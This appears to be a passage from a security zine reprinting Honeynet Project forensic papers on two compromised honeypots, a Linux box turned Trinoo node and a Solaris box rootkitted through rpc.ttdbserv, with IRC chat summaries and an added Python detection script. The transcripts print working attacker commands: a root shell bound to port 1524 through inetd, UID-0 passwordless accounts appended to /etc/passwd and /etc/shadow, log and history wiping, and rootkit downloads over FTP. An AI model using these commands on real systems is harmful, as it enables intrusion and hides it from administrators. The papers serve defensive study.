[root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c
bj.c:16: unterminated string or character constant
bj.c:12: possible real start of unterminated constant

She now attempts to implement the compiled backdoor.

[root@apollo /]# chown root:bin login
chown: login: No such file or directory
[root@apollo /]# chmod 4555 login
chmod: login: No such file or directory
[root@apollo /]# chmod u-w login
chmod: login: No such file or directory
[root@apollo /]# cp /bin/login /usr/bin/xstat
[root@apollo /]# cp /bin/login /usr/bin/old
[root@apollo /]# rm /bin/login
[root@apollo /]# chmod 555 /usr/bin/xstat
[root@apollo /]# chgrp bin /usr/bin/xstat
[root@apollo /]# mv login /bin/login
mv: login: No such file or directory
[root@apollo /]# rm bj.c

Dooh! She just can't get it right; let's try again. She ftp's to the site and re-downloads the backdoor.

[root@apollo /]# ftp 24.112.167.35
Connected to 24.112.167.35.
220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
Name (24.112.167.35:twin): [root@apollo /]# ftp 24.112.167.35
Connected to 24.112.167.35.
220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
Name (24.112.167.35:twin): welek
331 Password required for welek.
Password:331 Password required for welek.
Password:password
230 User welek logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get bj.c
qulocal: bj.c remote: bj.c
200 PORT command successful.
u150 Opening BINARY mode data connection for bj.c (1011 bytes).
226 Transfer complete.
1011 bytes received in 0.134 secs (7.3 Kbytes/sec)
ftp> itit
221-You have transferred 1011 bytes in 1 files.
221-Total traffic for this session was 1422 bytes in 1 transfers.
221-Thank you for using the FTP service on linux.
221 Goodbye.
This is now her second attempt at compiling the backdoor. Notice the exact same "cut and paste" commands are used.

[root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c
bj.c: In function `owned':
bj.c:16: warning: assignment makes pointer from integer without a cast

Now we see the compiled backdoor implemented. The valid copy of /bin/login is moved to /usr/bin/xstat, while the compiled trojan bj.c is used to replace /bin/login. This is the backdoor. This trojan allows anyone with the TERM setting of vt9111 unauthorized access.

[root@apollo /]# chown root:bin login
[root@apollo /]# chmod 4555 login
[root@apollo /]# chmod u-w login
[root@apollo /]# cp /bin/login /usr/bin/xstat
cp: /bin/login: No such file or directory
[root@apollo /]# cp /bin/login /usr/bin/old
cp: /bin/login: No such file or directory
[root@apollo /]# rm /bin/login
rm: cannot remove `/bin/login': No such file or directory
[root@apollo /]# chmod 555 /usr/bin/xstat
[root@apollo /]# chgrp bin /usr/bin/xstat
[root@apollo /]# mv login /bin/login

Now she covers her moves. I believe this is scripted, cut and paste. Look at all the commands she executed at a single command prompt. Also, I believe this is a 'generic' clean up script; notice how it tries to remove files that do not exist (such as /tmp/h).

[root@apollo /]# rm bj.c
[root@apollo /]#
[root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por qquituit
[root@apollo /.s]# ftpr 137.132.216.35 login: ftrp: command not found
[root@apollo /.s]#
[root@apollo /.s]# ftp 137.132.216.35
Connected to 137.132.216.35.
220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.

She gains access with the same user name that was inserted in our box.

Name (137.132.216.35:root): twin
331 Password required for twin.
Password:hax0r
230 User twin logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get d.tar.gz
local: d.tar.gz remote: d.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
226 Transfer complete.
8323 bytes received in 1.36 secs (6 Kbytes/sec)
ftp> quit
221-You have transferred 8323 bytes in 1 files.
221-Total traffic for this session was 8770 bytes in 1 transfers.
221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg.
221 Goodbye.
[root@apollo /.s]# gunzip d*
[root@apollo /.s]# tar -xvf d*
daemon/
daemon/ns.c
daemon/ns
[root@apollo /.s]# rm -rf d.tar
[root@apollo /.s]# cd daemon
[root@apollo daemon]# chmod u+u+x nsx ns
[root@apollo daemon]# ./ns

Our black-hat has just installed and started the Trinoo client. Next, she attempts to hop to another compromised system. Notice how she sets her VT TERM. This system most likely also has a backdoor. The connection fails since DNS is not working.

[root@apollo daemon]# TERM=vt1711
[root@apollo daemon]# telnet macau.hkg.com
macau.hkg.com: Unknown host
[root@apollo daemon]# exit
exit

Our friend leaves, only to return later from yet a different system (137.132.216.35) and attempt more mischief.

!"' #'!"# ' 9600,9600'VT9111VT9111
Red Hat Linux release 6.0 (Shedwig)
Kernel 2.2.5-15 on an i586
apollo /]# TERM=vt9111 telnet ns2.cpcc.cc.nc.us
ns2.cpcc.cc.nc.us: Unknown host
@apollo /}#telnet 1 152.43.29.52
Trying 152.43.29.52...
Connected to 152.43.29.52.
Escape character is '^]'.
!!!!!!Connection closed by foreign host.
te8ot@apollo /]# TERM=vt7877
[root@apollo /]# telnet sparky.w
itoot@apollo /]# exit
exit

Following this, several attempts were made to use the system as a Trinoo attack against other systems. At this point I disconnected the system. The black-hat intended to use the compromised system for destructive purposes and little more could be gained from monitoring the connection.

May 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335

Summary

We have just covered step by step how a honeypot was compromised, backdoored, and eventually used for a Trinoo attack. On 25 April, the black-hat first scanned the honeypot for which version of DNS it was running. The following day, on 26 April, she executed the NXT-Named exploit to gain a root shell (see the NXT-Howto for a black-hat HOWTO on the exploit). Once she gained a root shell, she created two system accounts, twin and hantu. Following this she immediately telnetted to the box, gained super user access, then downloaded and installed her backdoor, bj.c. She then executed a script to cover her tracks and then left the system. Over the following weeks she attempted to connect to the system; however, it was offline. Finally, on May 9 she gained access, installed and then executed Trinoo. At this point the honeypot was taken offline for good.
The majority of forensics was conducted using system logs from the compromised system and snort logs and alerts. Several other people have contributed additional analysis of the attack.

Conclusion

We have just covered a step by step analysis of how a honeypot was compromised. The goal was to determine how the system was compromised using forensic analysis of system and IDS logs. By analyzing this attack, you should have a better understanding of what to expect and look for when analyzing a system attack. If you would like to learn more about how this information was obtained, check out To Build A Honeypot.

I would like to thank both Marty Roesch and Max Vision for their contribution to the security community. What I have learned here would not have been possible without their hard work. All logs and information were forwarded to CERT before this information was released. Also, attempts were made to contact all IPs involved in the attack.

@HWA

305.0 [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Motives and Psychology of the Black-hat Community
Know Your Enemy: Motives
Written by the Honeynet Project
Last Modified: 27 June, 2000

This paper is a continuation of the Know Your Enemy series. This series is dedicated to learning the tools and tactics of the black-hat community. Unlike the previous papers which focused purely on the "what" and "how" of the black-hat community, specifically the technical tools, their use and implementation, this paper explores the motivation and psychology of the black-hat community, in their very own words. Part I starts with the compromise of a Solaris 2.6 system. Part II provides information rarely published, a record of conversations and actions which took place over a fourteen-day period following the compromise of a honeypot system. Learn how and why black-hats attack systems.
Once the Solaris 2.6 system was compromised, the black-hat put an IRC bot on our system. This bot, configured and implemented by the black-hat, captured all their conversations on an IRC channel. We monitored these conversations over a two week period, all of which are contained here. This paper is not meant to be a generalization of the black-hat community. Instead, we present a specific incident involving several individuals. However, this should give you an idea of how certain members can think and behave. This is a common threat that we all face in the security community, and we sincerely hope other security professionals benefit from this work.

This information was obtained through the use of a honeynet. A honeynet is a network of various honeypots, designed to be compromised by the black-hat community. While some honeypots are used to divert the attention of attackers from legitimate systems, the purpose of a honeynet is to learn the tools and tactics of the black-hat community. Most of the information provided in this document has been sanitized. Specifically, user identities and passwords, credit card numbers, and most of the system names involved have all been changed. However, the actual technical tools and the chat sessions themselves have not been sanitized. All this information was forwarded to both CERT and the FBI before being released. Also, over 370 notifications were sent out to administrators of systems we believed were compromised.

Foreword, by Brad Powell

Part I: The Compromise

A Solaris 2.6 default installation was used for our honeypot. No modifications or patches were installed on the system. The vulnerabilities discussed here exist in any default, unpatched installation of Solaris 2.6. That is the whole purpose of the honeynet, to identify vulnerabilities in production systems and learn how they are exploited. When exploited, we can then learn the tools and tactics of the black-hat community.
The honeynet itself is an environment designed to track the black-hat's every move. On June 4, 2000 our Solaris 2.6 honeypot was compromised with the rpc.ttdbserv Solaris exploit, which allows the execution of code via a buffer overflow in the ToolTalk object database server (CVE-1999-0003). Note that this exploit is also listed as #3 in the SANS Top Ten List. This attack was both detected and alerted by snort, a sniffer based IDS system.

    Jun 4 11:37:58 lisa snort[5894]: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775

The rpc.ttdbserv exploit is a buffer overflow attack that allows the remote user to execute commands on the system as root. The following command was executed, giving the black-hat a backdoor. The service ingreslock (predefined in /etc/services as port 1524) is added to a file called '/tmp/bob', and then inetd is executed with '/tmp/bob' as the configuration file. /bin/sh is then bound to port 1524 and is running as root, giving the remote user root access.

    /bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob

Once the black-hat created this backdoor, he connected to port 1524, accessed a shell as root, and executed the following commands. He creates two user accounts, so he can telnet back in. Notice the errors and control characters: the shell on port 1524 does not have a proper environment.

    # cp /etc/passwd /etc/.tp; ^Mcp /etc/shadow /etc/.ts; echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; echo "r::10891::::::" >> /etc/shadow; echo "re::6445::::::" >> /etc/shadow;
    : not found
    # ^M: not found
    # ^M: not found
    # ^M: not found
    # ^M: not found
    # ^M: not found
    # who;
    rsides console May 24 21:09
    ^M: not found
    # exit;

Our black-hat now has two accounts on our compromised system. He can now telnet in as the user 're', then su to the user 'r', which has UID 0, thus gaining root access.
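The detection side of the sequence just described, as an added example that is not part of the original paper: it parses the snort syslog alert format shown above, flags accounts appended to /etc/passwd and /etc/shadow the way 'r' and 're' were, and flags an inetd-style entry that binds a shell to a port. The sample alerts, passwd, shadow and inetd lines are constructed around the transcript.

```python
"""Triage helpers for a ttdbserv-style compromise (added example, not Honeynet Project code).

Three checks a defender runs after an IDS241 alert: parse snort's syslog alerts,
look for accounts added to passwd/shadow, and look for an inetd-style
configuration that binds a shell to a port.  All sample data is constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Timestamp, host and "snort[pid]:" prefix shared by every line snort writes to syslog.
_PREFIX = r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+(?P<host>\S+)\s+snort\[(?P<pid>\d+)\]:\s+"
# Signature alert: "IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775"
# (ports are absent on ICMP signatures such as "IDS171/Ping zeros: a -> b").
ALERT_RE = re.compile(
    _PREFIX + r"(?P<sig>[^:]+):\s+(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)
# Portscan preprocessor message: "spp_portscan: PORTSCAN DETECTED from 1.2.3.4"
SCAN_RE = re.compile(_PREFIX + r"spp_portscan: PORTSCAN DETECTED from (?P<src>[\d.]+)")


def parse_snort_alert(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the fields of one snort syslog line, or None if it is not a snort alert."""
    m = ALERT_RE.match(line)
    if m:
        return m.groupdict()
    m = SCAN_RE.match(line)
    if m:
        d = m.groupdict()
        d.update(sig="spp_portscan", sport=None, dst=None, dport=None)
        return d
    return None


def probes_by_source(lines: List[str]) -> Dict[str, List[str]]:
    """Group the signatures seen from each source address (a month of alerts boils down to this)."""
    seen = defaultdict(set)
    for line in lines:
        a = parse_snort_alert(line)
        if a:
            seen[a["src"]].add(a["sig"])
    return {src: sorted(sigs) for src, sigs in seen.items()}


def rogue_accounts(passwd_text: str, shadow_text: str) -> List[str]:
    """Flag UID 0 accounts other than root and shadow entries with an empty password field."""
    findings = []
    for raw in passwd_text.splitlines():
        f = raw.split(":")  # name:pw:uid:gid:gecos:home:shell
        if len(f) == 7 and f[2] == "0" and f[0] != "root":
            findings.append("passwd: extra UID 0 account %r" % f[0])
    for raw in shadow_text.splitlines():
        f = raw.split(":")  # name:hash:lastchg:...
        if len(f) >= 2 and f[1] == "":
            findings.append("shadow: empty password for %r" % f[0])
    return findings


SHELLS = {"/bin/sh", "/sbin/sh", "/bin/ksh", "/bin/csh", "/usr/bin/sh", "/bin/bash"}


def shell_services(inetd_text: str) -> List[str]:
    """Return inetd.conf-style entries whose server program is a shell (the /tmp/bob backdoor)."""
    hits = []
    for raw in inetd_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split()  # service socket proto flags user server [args...]
        if len(f) >= 6 and f[5] in SHELLS:
            hits.append(line)
    return hits


# --- constructed sample data, modelled on the transcript above ---
SAMPLE_ALERTS = [
    "Jun 4 11:37:58 lisa snort[5894]: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775",
    "Jun 4 11:30:02 lisa snort[5894]: spp_portscan: PORTSCAN DETECTED from 192.168.78.12",
    "Jun 4 11:31:10 lisa snort[5894]: IDS171/Ping zeros: 192.168.78.12 -> 172.16.1.107",
]
SAMPLE_PASSWD = "root:x:0:0:Super-User:/:/sbin/sh\nr:x:0:0:User:/:/sbin/sh\nre:x:500:1000:daemon:/:/sbin/sh\n"
SAMPLE_SHADOW = "root:PLACEHOLDERHASH:10891::::::\nr::10891::::::\nre::6445::::::\n"
SAMPLE_INETD = "ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd\ningreslock stream tcp nowait root /bin/sh sh -i\n"

if __name__ == "__main__":
    for src, sigs in probes_by_source(SAMPLE_ALERTS).items():
        print(src, sigs)
    for finding in rogue_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW) + shell_services(SAMPLE_INETD):
        print("!!", finding)
```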
We will now review the actual keystrokes of the black-hat as they do just that, and more.

    !"' !"P#$#$'LINUX'
    SunOS 5.6
    login: re
    Choose a new password.
    New password: abcdef
    Re-enter new password: abcdef
    telnet (SYSTEM): passwd successfully changed for re
    Sun Microsystems Inc. SunOS 5.6 Generic August 1997
    $ su r

Our black-hat now has root access. As is common, the next step is to retrieve the rootkit and take control of the system. First, we see the black-hat create a 'hidden' directory to hide the rootkit.

    # mkdir /dev/".. "
    # cd /dev/".. "

After creating the directory, the black-hat retrieves the rootkit from another system.

    # ftp shell.example.net
    Connected to shell.example.net.
    220 shell.example.net FTP server (Version 6.00) ready.
    Name (shell.example.net:re): j4n3
    331 Password required for j4n3.
    Password:abcdef
    230 User j4n3 logged in.
    ftp> get sun2.tar
    200 PORT command successful.
    150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes).
    226 Transfer complete.
    local: sun2.tar remote: sun2.tar
    1727580 bytes received in 2.4e+02 seconds (6.90 Kbytes/s)
    ftp> get l0gin
    200 PORT command successful.
    150 Opening ASCII mode data connection for 'l0gin' (47165 bytes).
    226 Transfer complete.
    local: l0gin remote: l0gin
    47378 bytes received in 7.7 seconds (6.04 Kbytes/s)
    ftp> quit
    221 Goodbye.

Once the rootkit is successfully downloaded, the kit is untarred and installed. Notice how the entire rootkit is installed by executing a single script, setup.sh. This script also calls another script, secure.sh. You can download the entire Solaris rootkit used in this attack here.
    # tar -xvf sun2.tar
    x sun2, 0 bytes, 0 tape blocks
    x sun2/me, 859600 bytes, 1679 tape blocks
    x sun2/ls, 41708 bytes, 82 tape blocks
    x sun2/netstat, 6784 bytes, 14 tape blocks
    x sun2/tcpd, 19248 bytes, 38 tape blocks
    x sun2/setup.sh, 1962 bytes, 4 tape blocks
    x sun2/ps, 35708 bytes, 70 tape blocks
    x sun2/packet, 0 bytes, 0 tape blocks
    x sun2/packet/sunst, 9760 bytes, 20 tape blocks
    x sun2/packet/bc, 9782 bytes, 20 tape blocks
    x sun2/packet/sm, 32664 bytes, 64 tape blocks
    x sun2/packet/newbc.txt, 762 bytes, 2 tape blocks
    x sun2/packet/syn, 10488 bytes, 21 tape blocks
    x sun2/packet/s1, 12708 bytes, 25 tape blocks
    x sun2/packet/sls, 19996 bytes, 40 tape blocks
    x sun2/packet/smaq, 10208 bytes, 20 tape blocks
    x sun2/packet/udp.s, 10720 bytes, 21 tape blocks
    x sun2/packet/bfile, 2875 bytes, 6 tape blocks
    x sun2/packet/bfile2, 3036 bytes, 6 tape blocks
    x sun2/packet/bfile3, 20118 bytes, 40 tape blocks
    x sun2/packet/sunsmurf, 11520 bytes, 23 tape blocks
    x sun2/sys222, 34572 bytes, 68 tape blocks
    x sun2/m, 9288 bytes, 19 tape blocks
    x sun2/l0gin, 47165 bytes, 93 tape blocks
    x sun2/sec, 1139 bytes, 3 tape blocks
    x sun2/pico, 222608 bytes, 435 tape blocks
    x sun2/sl4, 28008 bytes, 55 tape blocks
    x sun2/fix, 10360 bytes, 21 tape blocks
    x sun2/bot2, 508 bytes, 1 tape blocks
    x sun2/sys222.conf, 42 bytes, 1 tape blocks
    x sun2/le, 21184 bytes, 42 tape blocks
    x sun2/find, 6792 bytes, 14 tape blocks
    x sun2/bd2, 9608 bytes, 19 tape blocks
    x sun2/snif, 16412 bytes, 33 tape blocks
    x sun2/secure.sh, 1555 bytes, 4 tape blocks
    x sun2/log, 47165 bytes, 93 tape blocks
    x sun2/check, 46444 bytes, 91 tape blocks
    x sun2/zap3, 13496 bytes, 27 tape blocks
    x sun2/idrun, 188 bytes, 1 tape blocks
    x sun2/idsol, 15180 bytes, 30 tape blocks
    x sun2/sniff-10mb, 16488 bytes, 33 tape blocks
    x sun2/sniff-100mb, 16496 bytes, 33 tape blocks
    # rm sun2.tar
    # mv l0gin sun2
    # cd sun2
    # ./setup.sh
    hax0r w1th K1dd13
    Ok This thing is complete :-)

Here the rootkit installation script first cleans out the log files to delete the information associated with the black-hat's activities.

    - WTMP:
    /var/adm/wtmp is Sun Jun 4 11:47:39 2000
    /usr/adm/wtmp is Sun Jun 4 11:47:39 2000
    /etc/wtmp is Sun Jun 4 11:47:39 2000
    /var/log/wtmp cannot open
    WTMP = /var/adm/wtmp
    Removing user re at pos: 1440
    Done!
    - UTMP:
    /var/adm/utmp is Sun Jun 4 11:47:39 2000
    /usr/adm/utmp is Sun Jun 4 11:47:39 2000
    /etc/utmp is Sun Jun 4 11:47:39 2000
    /var/log/utmp cannot open
    /var/run/utmp cannot open
    UTMP = /var/adm/utmp
    Removing user re at pos: 288
    Done!
    - LASTLOG:
    /var/adm/lastlog is Sun Jun 4 11:47:39 2000
    /usr/adm/lastlog is Sun Jun 4 11:47:39 2000
    /etc/lastlog cannot open
    /var/log/lastlog cannot open
    LASTLOG = /var/adm/lastlog
    User re has no wtmp record. Zeroing lastlog..
    - WTMPX:
    /var/adm/wtmpx is Sun Jun 4 11:47:39 2000
    /usr/adm/wtmpx is Sun Jun 4 11:47:39 2000
    /etc/wtmpx is Sun Jun 4 11:47:39 2000
    /var/log/wtmpx cannot open
    WTMPX = /var/adm/wtmpx
    Done!
    - UTMPX:
    /var/adm/utmpx is Sun Jun 4 11:47:39 2000
    /usr/adm/utmpx is Sun Jun 4 11:47:39 2000
    /etc/utmpx is Sun Jun 4 11:47:39 2000
    /var/log/utmpx cannot open
    /var/run/utmpx cannot open
    UTMPX = /var/adm/utmpx
    Done!
    ./setup.sh: ./zap: not found

After cleaning the log files, the next step is to secure our system (how nice of them). They know we are an easy kill and they do not want anyone else to ruin their compromised system.

    ./secure.sh: rpc.ttdb=: not found
    #: securing.
    #: 1) changing modes on local files.
    #: will add more local security later.
    #: 2) remote crap like rpc.status , nlockmgr etc..
    ./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
    ./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
    #: 3) killed statd , rpcbind , nlockmgr
    #: 4) removing them so they ever start again!
    5) secured.
    207 ? 0:00 inetd
    11467 ? 0:00 inetd
    cp: cannot access /dev/.. /sun/bot2
    kill these processes@!#!@#!
    cp: cannot access lpq
    ./setup.sh: /dev/ttyt/idrun: cannot execute

Next, an IRC proxy is launched. What is bizarre is that later on the script kills this process.
I have no idea why.

    Irc Proxy v2.6.4 GNU project (C) 1998-99 Coded by James Seter :bugs-> (Pharos@refract.com) or IRC pharos on efnet
    --Using conf file ./sys222.conf
    --Configuration:
    Daemon port......:9879
    Maxusers.........:0
    Default conn port:6667
    Pid File.........:./pid.sys222
    Vhost Default....:-SYSTEM DEFAULT-
    Process Id.......:11599
    Exit ./sys222{7} :Successfully went into the background.

More file modifications are done. Not seen from the script output are the copying of Trojan binaries, including /bin/login, /bin/ls, /usr/sbin/netstat, and /bin/ps. I highly recommend you review the source of the setup.sh script and the secure.sh script to see what actually happens. One day you may have to review a system that has been rooted with a similar kit.

    # kill -9 11467
    # ps -u root |grep |grep inetd inetd
    207 ? 0:00 inetd
    # ..U/secure.sh/secure.sh
    ./secure.sh: rpc.ttdb=: not found
    #: securing.
    #: 1) changing modes on local files.
    #: will add more local security later.
    #: 2) remote crap like rpc.status , nlockmgr etc..
    ./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
    ./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
    ./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
    ./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
    #: 3) killed statd , rpcbind , nlockmgr
    #: 4) removing them so they ever start again!
    5) secured.
    # ppUs -u s -u U||U grep grep ttUtdbtdb
    Ups: option requires an argument -- u
    usage: ps [ -aAdeflcj ] [ -o format ] [ -t termlist ] [ -u userlist ] [ -U userlist ] [ -G grouplist ] [ -p proclist ] [ -g pgrplist ] [ -s sidlist ]
    'format' is one or more of: user ruser group rgroup uid ruid gid rgid pid ppid pgid sid pri opri pcpu pmem vsz rss osz nice class time etime stime f s c tty addr wchan fname comm args
    # ppUs -s -UAdj | grep ttdbAdj | grep ttdb

Last, our black-hat launches an IRC bot. The purpose of this bot is to ensure they will maintain ops on the IRC channel of their choice. This bot also recorded all their conversations on the IRC channel.
It is this bot that they installed on our compromised system that relayed their IRC chats on our network.

    # ../me -f bot2
    init: Using config file: bot2
    EnergyMech 2.7.1, December 2nd, 1999
    Starglider Class EnergyMech
    Compiled on Jan 27 2000 07:06:04
    Features: DYN, NEW, SEF
    init: Unknown configuration item: "NOSEEN" (ignored)
    init: Mechs added [ save2 ]
    init: Warning: save2 has no userlist, running in setup mode
    init: EnergyMech running...
    # exit;
    $ exit

Once the bot was in place, they left the system alone. It is this bot that captured all of their conversations (see Part II below). For more information on IRC and how the black-hat community uses IRC and bots, we highly recommend the paper Tracking Hackers on IRC by David Brumley.

Over the course of the following week they returned several times, only to confirm that they still had access. One week later, on 11 June, they connected again and attempted to use the system for Denial of Service attacks. However, the honeynet is designed to block any attempt to use a honeypot as a base of an attack against outside systems. All attempts to use the honeypot for a Denial of Service attack were automatically blocked.

What we have witnessed here are commonly used tools and tactics of the black-hat community. Our black-hat randomly scanned the Internet for a known vulnerability (in this case rpc.ttdbserv). Once identified, they quickly compromised the system and installed a rootkit using commonly scripted tools. Once they had control, they installed a bot, most likely to ensure they would maintain 'ops' on the IRC channels of their choice. What is uncommon are the two weeks of IRC chat sessions that their bot captured for us. In the next part of this paper, we discover the motivations and psychology of the black-hat community, in their own words. If you are concerned that your system(s) may have been compromised by similar means, review this checklist.
It covers what to check for and links on how to react to a system compromise.

Part II: The IRC Chat Sessions

Below are the actual chat sessions of the black-hat community, specifically two individuals whom we will call D1ck and J4n3. Most of their chats will happen on the IRC channel we will call K1dd13. You will read the activities of these two main characters, and a variety of others. The chat sessions are broken down by days, listed below. We recommend you read them in sequence, so you can better understand what is going on.

IRC channels, IRC nicks, system names and IP addresses have been sanitized. All system IP addresses have been replaced with RFC 1918 address space, all system domain names have been replaced with 'example', and all credit card numbers have been replaced by 'xxxx'. Any similarities the IRC channels or IRC nicks may have with the real world are purely coincidental. Be advised, some of the language used is abusive in nature; we have chosen not to sanitize this. Also, sometimes several of the black-hats will speak foreign languages. Where possible, we have translated this into English.

As you read these chat sessions, take into consideration their lack of skill and networking knowledge. Often you will see them attempting to figure out the most fundamental of Unix skills. And yet, they are still able to compromise or damage a large number of systems. This is not a threat to take lightly.

Day 1, June 04
Our chat sessions begin with the discussion of building an exploit archive and the sharing of exploits to be used against potential targets.

Day 2, June 05
Today D1ck and J4n3 share exploits and Denial of Service attacks. Notice how they brag about how many blists (broadcast amplifier networks) they have for the attacks. Looks like one of them is gunning for Linux boxes in .edu land. They also discussed using new rootkits for Linux and sparc.

Day 3, June 06
D1ck and J4n3 brag about the systems they have launched Denial of Service attacks against. Later on D1ck teaches J4n3 how to mount a drive. Then they discuss sniffit (how to use it) and last, D1ck desperately looks for an Irix exploit and rootkit.

Day 4, June 07
D1ck and J4n3 decided they want to take out India with Denial of Service attacks and bind exploits. Later on, they DoS other IRC members who irritate them.

Day 5, June 08
D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works: "umm doesnt it have to be the same network?".

Day 6, June 09
Our wonder team has been busy, looks like D1ck rooted over 40 systems. If they scan enough systems, they can and will gain root.

Day 7, June 10
Not an exciting day. D1ck teaches a new k1dd13 how to use the sadmind exploit. We are not sure if D1ck even knows how to use it himself.

Day 8, June 11
D1ck and J4n3 discuss systems they own and people they want to DoS. D1ck discovers Ping of Death and thinks he is very k3wl.

Day 9, June 12
Looks like D1ck strikes it big: he finds an ISP and gains access to their billing and over 5,000 user accounts. Now they have to figure out how to crack them.

Day 10, June 13
Sp07 joins the gang today. Not the friendliest individual for the Internet community. Seems to have taken a wee bit of a dislike to India also.

Day 11, June 14
They start cracking user passwords and access personal accounts.

Day 12, June 15 (also with Romanian translated)
D1ck and J4n3 try to find credit card numbers on a Credit Card channel so they can buy some domain names.

Day 13, June 16 (also with Romanian translated)
D1ck and J4n3 still hang out on the Credit Card channel. Members swap credit cards, shell accounts, and porn sites. At the end of the chat session, D1ck and J4n3 focus on their website.

Day 14, June 17 (also with Romanian translated)
D1ck and J4n3 cover how to gain accounts on a Linux box, talk more about Credit Cards and continue building a website.

We have just reviewed 14 days in the life of the black-hat community.
This is not meant to imply that all black-hats think and act like this. In fact, we have focused only on a few specific individuals. However, we hope this information gives you an idea of what many of the community are capable of. They may not be technically competent, or even understand the tools they are using. However, by focusing on a large number of systems, they can achieve dramatic results. This is not a threat to take lightly. They are not concerned about what harm they may cause. They focus only on achieving their goals.

Conclusion

The purpose of this paper is to give you an understanding of the motives and psychology of the black-hat community. The paper started off with the system compromise of a Solaris 2.6 honeypot. It demonstrated a commonly used remote exploit of a vulnerable system. Once compromised, the system was quickly controlled with a rootkit, another commonly used tool among the black-hat community. However, what makes this paper unique is the look you get into the black-hat mentality. Here, you saw in their very own words how they think and act, particularly how they can indiscriminately attack and damage systems. They randomly probe large numbers of systems and attack the weakest systems they can find. By understanding their motives and methods, you can better protect your systems against this threat.

Acknowledgments

This paper is the result of the work and research of the Honeynet Project. The Honeynet Project is a small group of security professionals dedicated to learning the tools and tactics of the black-hat community. Part of the group's charter is to share these lessons learned with the security community. This paper is the first of future works by this group. Members of the group include:

Anne Marie Tenholder, Technology Research - Hiverworld, Inc.
Brad Powell, Sun Microsystems GESS Global Security Team
Chris Brenton, Dartmouth ISTS
David Dittrich, Senior Security Engineer - University of Washington
Ed Skoudis - Global Integrity Corp.
Frank Heidt - @stake
Fyodor, Author of Nmap Security Scanner and Insecure.Org.
George Kurtz, CEO - Foundstone, Inc.
K2
JD Glaser, NT Security Team - Foundstone, Inc.
John McDonald, TUV / Dataprotect GmbH
Lance Spitzner, Sun Microsystems GESS Global Security Team.
Martin Roesch, Director of Forensic Systems, Hiverworld, Inc
Max Vision, creator of arachNIDS and whitehats.com.
Robin Wakefield, Sun Microsystems GESS Global Security Team
Roger Safian
Saumil Shah, Principal Consultant (and Honeynet Project translator) - Foundstone, Inc.
Stuart McClure - Foundstone, Inc.
Tom Stracener, Technology Research, Hiverworld, Inc.
Vacuum, Technotronic.com

Also, I would like to thank Alan Paller of SANS. Though not a member of the Honeynet Project, he has helped me make this research a reality.

@HWA

306.0 [IND] Support docs and logs from the Know your enemy papers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

